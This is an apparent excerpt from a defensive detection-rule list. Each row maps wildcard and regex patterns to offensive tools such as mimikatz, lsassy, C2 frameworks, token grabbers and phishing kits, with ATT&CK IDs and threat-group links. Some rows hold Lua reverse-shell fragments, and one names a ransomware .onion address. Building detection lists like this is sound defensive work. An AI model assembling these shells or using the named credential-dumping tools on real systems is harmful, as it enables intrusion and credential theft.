"*LSASS minidump file for *",".{0,1000}LSASS\sminidump\sfile\sfor\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51418"
"*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51420"
"*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","lsass","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","N/A","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51421"
"*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","51422"
"*lsass.exe*.dmp*",".{0,1000}lsass\.exe.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","51423"
"*lsass.exe*C:\temp\tmp.tmp*",".{0,1000}lsass\.exe.{0,1000}C\:\\temp\\tmp\.tmp.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","51424"
"*lsass_*.dmp*",".{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51425"
"*lsass_dump_*",".{0,1000}lsass_dump_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51426"
"*lsass_dump_lsassy_*",".{0,1000}lsass_dump_lsassy_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51427"
"*lsassdump.dmp*",".{0,1000}lsassdump\.dmp.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","51428"
"*LsassDump_20*.ps1*",".{0,1000}LsassDump_20.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","N/A","10","1104","174","2025-01-28T10:47:44Z","2021-10-08T17:36:24Z","51429"
"*lsassDumpRetryCount*",".{0,1000}lsassDumpRetryCount.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","51430"
"*lsassdumps*",".{0,1000}lsassdumps.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","51431"
"*LSASSProtectionBypass*/",".{0,1000}LSASSProtectionBypass.{0,1000}\/","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","51433"
"*LsassSilentProcessExit.cpp*",".{0,1000}LsassSilentProcessExit\.cpp.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","51434"
"*LsassSilentProcessExit.exe*",".{0,1000}LsassSilentProcessExit\.exe.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","51435"
"*LsassSilentProcessExit.vcxproj*",".{0,1000}LsassSilentProcessExit\.vcxproj.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","51436"
"*LsassSilentProcessExit-master*",".{0,1000}LsassSilentProcessExit\-master.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","51437"
"*lsassy *",".{0,1000}lsassy\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51438"
"*lsassy -*",".{0,1000}lsassy\s\-.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","51439"
"*lsassy -v -*",".{0,1000}lsassy\s\-v\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51440"
"*lsassy.*",".{0,1000}lsassy\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51441"
"*lsassy.impacketfile*",".{0,1000}lsassy\.impacketfile.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51442"
"*lsassy/dumpmethod*",".{0,1000}lsassy\/dumpmethod.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51443"
"*lsassy_dump*",".{0,1000}lsassy_dump.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","51444"
"*lsassy_dump*",".{0,1000}lsassy_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51445"
"*lsassy_dump.py*",".{0,1000}lsassy_dump\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","51446"
"*lsassy_linux_amd64*",".{0,1000}lsassy_linux_amd64.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51447"
"*lsassy_logger.*",".{0,1000}lsassy_logger\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51448"
"*lsassy_windows_amd64*",".{0,1000}lsassy_windows_amd64.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51449"
"*lsassy-linux-x64-*",".{0,1000}lsassy\-linux\-x64\-.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51450"
"*lsassy-MacOS-x64-*",".{0,1000}lsassy\-MacOS\-x64\-.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51451"
"*lsassy-windows-latest.zip*",".{0,1000}lsassy\-windows\-latest\.zip.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51452"
"*lsassy-windows-x64-*.exe",".{0,1000}lsassy\-windows\-x64\-.{0,1000}\.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51453"
"*lsattr -a /usr/bin/ /bin/ /sbin/ /usr/sbin/ 2>/dev/null*",".{0,1000}lsattr\s\-a\s\/usr\/bin\/\s\/bin\/\s\/sbin\/\s\/usr\/sbin\/\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","51454"
"*lse.sh -l*",".{0,1000}lse\.sh\s\-l.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","51455"
"*lsecqt/OffensiveCpp*",".{0,1000}lsecqt\/OffensiveCpp.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","51456"
"*lu4p/ToRat*",".{0,1000}lu4p\/ToRat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51460"
"*lua -e*require('socket');*t:connect*os.execute('""/bin/bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51461"
"*lua -e*require('socket');*t:connect*os.execute('""/bin/sh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/sh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51462"
"*lua -e*require('socket');*t:connect*os.execute('""bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51463"
"*lua -e*require('socket');*t:connect*os.execute('""cmd"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""cmd\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51464"
"*lua -e*require('socket');*t:connect*os.execute('""powershell"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""powershell\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51465"
"*lua -e*require('socket');*t:connect*os.execute('""pwsh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""pwsh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51466"
"*lua -e*require('socket');*t:connect*os.execute('""zsh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""zsh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51467"
"*lua -e*require('socket');*t:connect*os.execute('sh -i <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'sh\s\-i\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51468"
"*lua5.1 -e*require(""socket"")*tcp:connect*io.popen*receive()*send()*",".{0,1000}lua5\.1\s\-e.{0,1000}require\(\""socket\""\).{0,1000}tcp\:connect.{0,1000}io\.popen.{0,1000}receive\(\).{0,1000}send\(\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51469"
"*luckbit53sdne5yd5vdekadhwnbzjyqlbjkc4g33hs6faphfkvivaeid.onion*",".{0,1000}luckbit53sdne5yd5vdekadhwnbzjyqlbjkc4g33hs6faphfkvivaeid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51470"
"*luckystrike.ps1*",".{0,1000}luckystrike\.ps1.{0,1000}","offensive_tool_keyword","luckystrike","A PowerShell based utility for the creation of malicious Office macro documents.","T1566 - T1059 - T1027","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/curi0usJack/luckystrike","1","1","N/A","N/A","10","10","1108","241","2017-11-03T17:52:13Z","2016-09-22T18:57:50Z","51471"
"*Luct0r/KerberOPSEC*",".{0,1000}Luct0r\/KerberOPSEC.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","51472"
"*LUgsLS1IT1NU*",".{0,1000}LUgsLS1IT1NU.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51473"
"*luijait/PwnKit*",".{0,1000}luijait\/PwnKit.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tool","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","N/A","1","96","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z","51474"
"*luks2john.py*",".{0,1000}luks2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51475"
"*Luna Grabber | Created By Smug*",".{0,1000}Luna\sGrabber\s\|\sCreated\sBy\sSmug.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","51476"
"*Luna Grabber Builder - Running on v*",".{0,1000}Luna\sGrabber\sBuilder\s\-\sRunning\son\sv.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","51477"
"*lures create *",".{0,1000}lures\screate\s.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","51478"
"*LVAsLS1QT1JU*",".{0,1000}LVAsLS1QT1JU.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51479"
